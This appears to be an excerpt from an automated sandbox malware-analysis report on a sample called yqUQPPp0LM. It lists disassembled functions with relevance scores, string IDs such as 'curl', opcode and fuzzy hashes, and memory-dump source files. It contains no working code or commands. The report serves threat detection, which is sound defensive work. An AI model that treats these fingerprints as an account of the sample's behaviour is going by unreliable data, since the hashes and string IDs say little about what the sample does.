                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$4
                                        • API String ID: 0-353776824
                                        • Opcode ID: ab429504a28d75dfcafd511286f6d5d26b4000396ee48abca96cf5fde9cf9c9d
                                        • Instruction ID: a5a5a3e5ca5a41bb92daaca4f4bb5fc4727156716c4d236b43d25ba61c92c6fc
                                        • Opcode Fuzzy Hash: ab429504a28d75dfcafd511286f6d5d26b4000396ee48abca96cf5fde9cf9c9d
                                        • Instruction Fuzzy Hash: 5822F33150C7429FC314DF28C4806AAF7E0FF86318F148A7EE89997391E775A895CB92
                                        Function 00BA1BD0 Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$4
                                        • API String ID: 0-353776824
                                        • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                        • Instruction ID: 080c68daaad776e1ce2345014a0901544eb407603595cd5fcfa935d7127c2b32
                                        • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                        • Instruction Fuzzy Hash: 2A12BF32A0C7118BC764CF1CC4807AAB7E5FFD5318F198ABDE89957291D774A884CB82
                                        Function 00BB4780 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H$xn--
                                        • API String ID: 0-4022323365
                                        • Opcode ID: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                        • Instruction ID: 850cc0b02ac32cd73f1aa40c369674eb32f8712eda4d956592f0bdd5bf7c0f3d
                                        • Opcode Fuzzy Hash: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                        • Instruction Fuzzy Hash: 9EE106716087158BD718DE28D8C06BAB7D2FBC4314F198A7DE99687382E7B4DC458742
                                        Function 008410E6 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Downgrades to HTTP/1.1$multi.c
                                        • API String ID: 0-3089350377
                                        • Opcode ID: 5179599da7251cbdea8733e725c014b3690d00752b3083186aa113e5820811f9
                                        • Instruction ID: 48315e94661c954c7c107b1490bab2475200ee54669a20bd44d35411621e8ac8
                                        • Opcode Fuzzy Hash: 5179599da7251cbdea8733e725c014b3690d00752b3083186aa113e5820811f9
                                        • Instruction Fuzzy Hash: B6C1D371A08709ABDB109F68D88576AB7E0FF94308F04453CF549D7292E770E998CB93
                                        Function 00B856D0 Relevance: 2.3, Strings: 1, Instructions: 1063COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BQ`
                                        • API String ID: 0-1649249777
                                        • Opcode ID: 92d886cfddbef1b8f0b7a174d62a203af721989c1b1e1f1c1304110c95212ad8
                                        • Instruction ID: b7b73abe89094b22c758d986e786be5d423d9de44114132682ea64a8c2d97af7
                                        • Opcode Fuzzy Hash: 92d886cfddbef1b8f0b7a174d62a203af721989c1b1e1f1c1304110c95212ad8
                                        • Instruction Fuzzy Hash: EEA27B71A087558FCB28DF18C4D06A9BBE1FF88314F1986ADE9998B361D730E941CF91
                                        Function 008FE3E0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \
                                        • API String ID: 0-2967466578
                                        • Opcode ID: 2905883edb2b53c7043a67125f6c5de1de7671900649c296372739decc570299
                                        • Instruction ID: 05bb09727a9c4f9a558a19ddb6888324beddfee27eb121e456a256631c7f8b97
                                        • Opcode Fuzzy Hash: 2905883edb2b53c7043a67125f6c5de1de7671900649c296372739decc570299
                                        • Instruction Fuzzy Hash: 4102E36291431D6BEB60AA34DC81B3B7AD8FB50344F044539FF89D6262F625ED18C7A3
                                        Function 00B97CC0 Relevance: 1.8, Strings: 1, Instructions: 517COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D
                                        • API String ID: 0-2746444292
                                        • Opcode ID: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                        • Instruction ID: 970e679a608c0bba3650d4a6d0a017e44656666d4d4b4d090bff68cca89b60a9
                                        • Opcode Fuzzy Hash: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                        • Instruction Fuzzy Hash: E132597290C7918BC725DF28D4806AEF7E1FFC9304F158A6DE9D9A3251DB30A945CB82
                                        Function 009000E0 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H
                                        • API String ID: 0-2852464175
                                        • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                        • Instruction ID: a95e33546dd446367ced5617ca2ea730d494920f7d6e884e0a1b9a89088be05f
                                        • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                        • Instruction Fuzzy Hash: B691B431B0C3518FCB19CE1CC49062EB7E3ABC9314F1A853DD99A973D1DA35AC468B86
                                        Function 0089B560 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: curl
                                        • API String ID: 0-65018701
                                        • Opcode ID: 6325c61f4a295e718de36609935e8658f15acd879cc5149c59ade8d9b31b6ef9
                                        • Instruction ID: c009e06022c0f963635fab38af70a38cd1339e0c10928965863d810f7a56f654
                                        • Opcode Fuzzy Hash: 6325c61f4a295e718de36609935e8658f15acd879cc5149c59ade8d9b31b6ef9
                                        • Instruction Fuzzy Hash: F76195B18047449BD721DF24D8417EBB3E8FF99304F04866DE9889B212F771E698C752
                                        Function 00B4AE30 Relevance: .6, Instructions: 598COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                        • Instruction ID: 32b7c8b52b55d7a24b8e5e57b0732398502204fbca8a0e48332696225626ab56
                                        • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                        • Instruction Fuzzy Hash: EA2264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                        Function 00BACD80 Relevance: .6, Instructions: 574COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                        • Instruction ID: ff06da00135a4ea31631b13b9784b532103e309b26a69539721400acb44cb248
                                        • Opcode Fuzzy Hash: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                        • Instruction Fuzzy Hash: 3112B676F483154BC30CED6DC992359FAD797CC310F1A893EA95ADB3A0E9B9EC014681
                                        Function 01B87421 Relevance: .5, Instructions: 538COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, Offset: 01B81000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_3_1b81000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee003c9367d561526872b8fff797a0abbe079b927ef697334715ef1fab2d93f8
                                        • Instruction ID: c6b067820f24394ed181760051ec8a4f8e20bd62046e06dbc26a55dbdc77fd52
                                        • Opcode Fuzzy Hash: ee003c9367d561526872b8fff797a0abbe079b927ef697334715ef1fab2d93f8
                                        • Instruction Fuzzy Hash: 67E1609264E7C18FE7139B7898256A07FB09E67214B4F44EBD0C0CF4F3E618588AD762
                                        Function 01B8666C Relevance: .5, Instructions: 465COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, Offset: 01B81000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_3_1b81000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c060efc89e5f186a24854edd86083c3d00e02110b9e80d45d0da9c7cdc5d6e9
                                        • Instruction ID: 02d87f80432b4a1658a03bec137029c44ef2f9cfb8225df107a1436d9071e6ca
                                        • Opcode Fuzzy Hash: 4c060efc89e5f186a24854edd86083c3d00e02110b9e80d45d0da9c7cdc5d6e9
                                        • Instruction Fuzzy Hash: 1BF189A664E7C04FE3439778A8656A07FB19F13224B4F14EBD0C0CF4B3E159488AD7A6
                                        Function 00AE9C80 Relevance: .5, Instructions: 451COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
